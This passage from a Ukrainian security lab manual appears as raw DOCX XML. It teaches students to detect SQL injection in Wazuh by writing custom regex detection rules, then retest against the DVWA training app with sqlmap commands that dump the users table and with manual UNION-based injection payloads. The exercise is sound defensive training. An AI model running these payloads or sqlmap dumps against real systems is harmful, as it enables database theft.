          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">алертів пов’язаних з </w:t>
      </w:r>
      <w:r w:rsidR="00F534BD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4711BFEA" w14:textId="2F5E9569" w:rsidR="009E6723" w:rsidRDefault="00F534BD" w:rsidP="00F534BD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розділі </w:t>
      </w:r>
      <w:r w:rsidRPr="00F534BD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Discover</w:t>
      </w:r>
      <w:r w:rsidRPr="00F534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знайдіть алерти, що містять ключове слово </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“sqlmap”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96AF0A" w14:textId="1D456375" w:rsidR="00F534BD" w:rsidRDefault="00F534BD" w:rsidP="00F534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282B18C" wp14:editId="226C0920">
            <wp:extent cx="4822166" cy="1770103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0049" cy="178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533F5" w14:textId="6DD2245F" w:rsidR="00F534BD" w:rsidRPr="00F534BD" w:rsidRDefault="00F534BD" w:rsidP="00F534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5 – Приклад сповіщення пов’язаного зі скануванням за допомогою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</w:p>
    <w:p w14:paraId="709BEF10" w14:textId="48CB10BB" w:rsidR="00F534BD" w:rsidRDefault="00F534BD" w:rsidP="00F534BD">
      <w:pPr>
        <w:pStyle w:val="a3"/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Проаналізуйе деталі алерту:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314DA7FB" w14:textId="2186B92F" w:rsidR="00F534BD" w:rsidRDefault="00F534BD" w:rsidP="00F534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Натисніть на алерт для розгортання деталей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487B0AED" w14:textId="2BF56895" w:rsidR="00F534BD" w:rsidRDefault="00F534BD" w:rsidP="00F534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повний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  <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-запит.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D74817" w14:textId="01F23166" w:rsidR="00F534BD" w:rsidRDefault="00F534BD" w:rsidP="00F534B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Зверніть увагу на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патерни у параметрах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435DC9AE" w14:textId="451FDDD3" w:rsidR="00F534BD" w:rsidRPr="00F534BD" w:rsidRDefault="00F534BD" w:rsidP="00F534B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4BD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Завдання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нових правил виявлення.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC89873" w14:textId="213B1F9B" w:rsidR="00F534BD" w:rsidRPr="00F534BD" w:rsidRDefault="00F534BD" w:rsidP="00F534BD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="7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терміналі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(хост) за допомогою редактора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nano</w:t>
      </w:r>
      <w:r w:rsidRPr="00F53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відкрийте файл з правилами командою:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D5338C" w14:textId="556C3E38" w:rsidR="00D84170" w:rsidRDefault="00F534BD" w:rsidP="00F534B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534BD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>sudo nano /var/lib/docker/volumes/soc-lab_wazuh_etc/_data/rules/local_rules.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349BD45E" w14:textId="58333F31" w:rsidR="00F534BD" w:rsidRDefault="00F534BD" w:rsidP="00F534BD">
      <w:pPr>
        <w:pStyle w:val="a3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кінець файлу </w:t>
      </w:r>
      <w:r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rules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додайте наступні правила для виявлення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ін’єкцій:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410C1EAE" w14:textId="40A5A0EA" w:rsidR="00F534BD" w:rsidRDefault="00F534BD" w:rsidP="00F534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0555">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38C76872" wp14:editId="068BEA3C">
            <wp:extent cx="4461266" cy="3390181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7026" cy="3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15CA" w14:textId="22165655" w:rsidR="00F534BD" w:rsidRPr="00F534BD" w:rsidRDefault="00F534BD" w:rsidP="00F534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6 – Приклад додавання правил в файл </w:t>
      </w:r>
      <w:r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534B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rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00F534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</w:p>
    <w:p w14:paraId="16609E26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>&lt;group name="custom_sql_injection,web,attack,"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139FC584" w14:textId="77777777" w:rsidR="00F534BD" w:rsidRPr="00677722" w:rsidRDefault="00F534BD" w:rsidP="00F534BD">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="736904C9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&lt;!-- SQL keywords detection (post-decoder) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE976D4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&lt;rule id="100120" level="10"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D805464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&lt;if_group&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/if_group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F327511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&lt;regex type="pcre2"&gt;(?i)(union|select|insert|update|delete|drop|create|alter|exec|benchmark|sleep)&lt;/regex&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC1E705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&lt;description&gt;Custom SQL Injection detected: SQL keywords&lt;/description&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C85620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&lt;mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9CE304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  &lt;id&gt;T1190&lt;/id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBDDEAE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&lt;/mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221484F7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&lt;group&gt;attack,sql_injection,custom&lt;/group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083DC3B6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&lt;/rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4489D7A3" w14:textId="77777777" w:rsidR="00F534BD" w:rsidRPr="00677722" w:rsidRDefault="00F534BD" w:rsidP="00F534BD">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77225CBB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&lt;!-- SQL comment patterns --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4C6DF0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&lt;rule id="100121" level="10"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2281B5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&lt;if_group&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/if_group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D6B76D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&lt;regex type="pcre2"&gt;(--|#|/\*|\*/)&lt;/regex&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69478CB0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&lt;description&gt;Custom SQL Injection detected: SQL comment usage&lt;/description&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ED2FB3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&lt;mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4BD838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  &lt;id&gt;T1190&lt;/id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB2AF49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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;/mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FB86A5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&lt;group&gt;attack,sql_injection,custom&lt;/group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77693CFB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&lt;/rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B556F9C" w14:textId="77777777" w:rsidR="00F534BD" w:rsidRPr="00677722" w:rsidRDefault="00F534BD" w:rsidP="00F534BD">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37A7620E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&lt;!-- Classic SQLi logic --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B697746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&lt;rule id="100122" level="12"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08117726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&lt;if_group&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/if_group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2114A18E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</w:t>
      </w:r>
      <w:r w:rsidRPr="000E4BF4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;regex type="pcre2"&gt;(?i)(%27|\')(%20|\+)*(or|and)(%20|\+)*[0-9]+(%3d|=)[0-9]+&lt;/regex&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8699A2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&lt;description&gt;Custom SQL Injection detected: classic boolean-based SQLi&lt;/description&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C0958C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&lt;mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C35F074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  &lt;id&gt;T1190&lt;/id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C566EC0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&lt;/mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE3A912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&lt;group&gt;attack,sql_injection,custom&lt;/group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD9F1E6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&lt;/rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16220702" w14:textId="77777777" w:rsidR="00F534BD" w:rsidRPr="00677722" w:rsidRDefault="00F534BD" w:rsidP="00F534BD">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32739458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&lt;!-- UNION-based SQLi --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170ECBCA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&lt;rule id="100123" level="12"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DACB35D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&lt;if_group&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/if_group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5569CC5A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</w:t>
      </w:r>
      <w:r w:rsidRPr="000E4BF4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;regex type="pcre2"&gt;(?i)(union(%20|\s)+all(%20|\s)+select|union(%20|\s)+select)&lt;/regex&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D1832B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&lt;description&gt;Custom SQL Injection detected: UNION-based SQLi&lt;/description&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA1E6BB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&lt;mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641D732A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  &lt;id&gt;T1190&lt;/id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D80D4A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&lt;/mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7382B376" w14:textId="77777777" w:rsidR="00F534BD" w:rsidRPr="00677722" w:rsidRDefault="00F534BD" w:rsidP="00F534BD">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;group&gt;attack,sql_injection,custom&lt;/group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782B9F10" w14:textId="77777777" w:rsidR="00F534BD" w:rsidRDefault="00F534BD" w:rsidP="00F534BD">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E207DB9" w14:textId="0C3F906E" w:rsidR="00F534BD" w:rsidRPr="00D925AC" w:rsidRDefault="00F534BD" w:rsidP="00D925AC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD2DB41" w14:textId="2DC90048" w:rsidR="00F534BD" w:rsidRPr="00F534BD" w:rsidRDefault="00F534BD" w:rsidP="00D925AC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Перезапустіть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wazuh-manager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EFB4AE5" w14:textId="77777777" w:rsidR="00F534BD" w:rsidRPr="000B517F" w:rsidRDefault="00F534BD" w:rsidP="00F534BD">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Виконайте в терміналі:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2975065D" w14:textId="77777777" w:rsidR="00F534BD" w:rsidRDefault="00F534BD" w:rsidP="00F534BD">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B517F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidRPr="00950555">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>docker restart wazuh-manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41601B12" w14:textId="38F4CBDB" w:rsidR="00F534BD" w:rsidRDefault="00F534BD" w:rsidP="00F534B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534BD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Завдання 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Повторне тестування та перевірка виявлення.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5315F25B" w14:textId="2F46AD21" w:rsidR="000A2B8C" w:rsidRPr="000A2B8C" w:rsidRDefault="00F534BD" w:rsidP="000A2B8C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Kali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виконайте кількі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F534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спроб, виконуючи декілька попередніх команд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вручну (в розділі </w:t>
      </w:r>
      <w:r w:rsidRPr="000A2B8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2B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A2B8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Injection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веб-сайті </w:t>
      </w:r>
      <w:r w:rsidRPr="000A2B8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DVWA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55DED3B" w14:textId="77777777" w:rsidR="000A2B8C" w:rsidRDefault="000A2B8C" w:rsidP="000A2B8C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B517F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "$TARGET_URL" --cookie="$COOKIE" -D dvwa -T users --dump </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="000B517F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F62BA21" w14:textId="77777777" w:rsidR="000A2B8C" w:rsidRDefault="000A2B8C" w:rsidP="000A2B8C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="298B3CF9" w14:textId="77777777" w:rsidR="000A2B8C" w:rsidRDefault="000A2B8C" w:rsidP="000A2B8C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B517F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">sqlmap -u "$TARGET_URL" --cookie="$COOKIE" --current-user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="000B517F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAEE865" w14:textId="77777777" w:rsidR="000A2B8C" w:rsidRDefault="000A2B8C" w:rsidP="000A2B8C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A165B46" w14:textId="77777777" w:rsidR="000A2B8C" w:rsidRDefault="000A2B8C" w:rsidP="000A2B8C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001111E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> На веб-сайті </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DVWA (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">розділ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL Injection)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B84FDD" w14:textId="77777777" w:rsidR="000A2B8C" w:rsidRDefault="000A2B8C" w:rsidP="000A2B8C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47DCBD68" w14:textId="77777777" w:rsidR="000A2B8C" w:rsidRPr="00677722" w:rsidRDefault="000A2B8C" w:rsidP="000A2B8C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1' AND 1=0 UNION SELECT database(),'1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5B1CBD" w14:textId="77777777" w:rsidR="000A2B8C" w:rsidRDefault="000A2B8C" w:rsidP="000A2B8C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F143719" w14:textId="456C8775" w:rsidR="000A2B8C" w:rsidRPr="000A2B8C" w:rsidRDefault="000A2B8C" w:rsidP="000A2B8C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1' AND 1=0 UNION SELECT null, table_name FROM information_schema.tables WHERE table_schema=database() UNION SELECT null,'1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FCE1E3" w14:textId="00F1D220" w:rsidR="000A2B8C" w:rsidRDefault="000A2B8C" w:rsidP="000A2B8C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="240"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Поверніться до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:r w:rsidRPr="000A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Dashboard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Оновіть сторінку </w:t>
      </w:r>
      <w:r w:rsidRPr="000A2B8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Threat Hunting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D6176BC" w14:textId="00C41F32" w:rsidR="000A2B8C" w:rsidRPr="008F6D75" w:rsidRDefault="000A2B8C" w:rsidP="000A2B8C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Перевірте чи спрацювали нові правила:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53457619" w14:textId="5BACA204" w:rsidR="000A2B8C" w:rsidRDefault="000A2B8C" w:rsidP="000A2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A8B655" wp14:editId="78679DB6">
            <wp:extent cx="5460521" cy="1900530"/>
            <wp:effectExtent l="0" t="0" r="698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963" cy="19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06905" w14:textId="7AE4B2CF" w:rsidR="000A2B8C" w:rsidRPr="000A2B8C" w:rsidRDefault="000A2B8C" w:rsidP="000A2B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7 – Приклад алертів з новими правилами</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8CF094" w14:textId="5F5B576B" w:rsidR="000A2B8C" w:rsidRDefault="000A2B8C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357F82" w14:textId="49EF8890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6DCC0" w14:textId="705F5C75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AE2E0" w14:textId="408E7448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FBDE2" w14:textId="5AF444C4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EFFD9" w14:textId="3CAA1035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3C9C11" w14:textId="273C17B6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666B4C" w14:textId="3F2F15B5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608518" w14:textId="6DDE9001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476F9A" w14:textId="65911686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9F9A3" w14:textId="218A855C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AD52A" w14:textId="384095AF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F1CC9A" w14:textId="5EDBD3C4" w:rsidR="00591A7F" w:rsidRDefault="00591A7F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57E537" w14:textId="7EED66B3" w:rsidR="00D925AC" w:rsidRDefault="00D925AC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89E14E" w14:textId="77777777" w:rsidR="008F6D75" w:rsidRDefault="008F6D75" w:rsidP="000A2B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5400A" w14:textId="09424227" w:rsidR="00591A7F" w:rsidRPr="00A10B9C" w:rsidRDefault="00591A7F" w:rsidP="00591A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B9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Контрольні запитання</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF07D07" w14:textId="77A2EF16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є основною причиною виникнення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0BB0F16" w14:textId="7149EC39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тип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дозволяє отримувати дані через повідомлення про помилки СУБД?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF832AE" w14:textId="3EEB5D9E" w:rsidR="00A10B9C" w:rsidRP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оператор зазвичай використовується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UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00A10B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A1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 w:rsidRPr="00A10B9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667353AF" w14:textId="61068B6D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фінкція часто використовується при </w:t>
      </w:r>
      <w:r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based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Blind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Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00A10B9C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31FB58E" w14:textId="5BAEE2F3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приклад є класичною атакою обходу автентифікації?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4565E8" w14:textId="72131856" w:rsidR="00A10B9C" w:rsidRP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системна таблиця містить інформацію про всі таблиці бази даних у </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A10B9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6199A110" w14:textId="0A9255BC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команда в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  <w:r w:rsidRPr="00A1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 для отримання списку без даних?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEFC80B" w14:textId="17143BE5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параметр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  <w:r w:rsidRPr="00A10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дозволяє отримати поточного користувача БД?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4A7ADB" w14:textId="0D3945EC" w:rsidR="00A10B9C" w:rsidRP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індикатор у логах може свідчити про роботу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00A10B9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693C3624" w14:textId="28781D83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Який тип </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQLi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повертає дані безпосередньо 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10B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відповіді?</w:t>
      </w:r>
    </w:p>
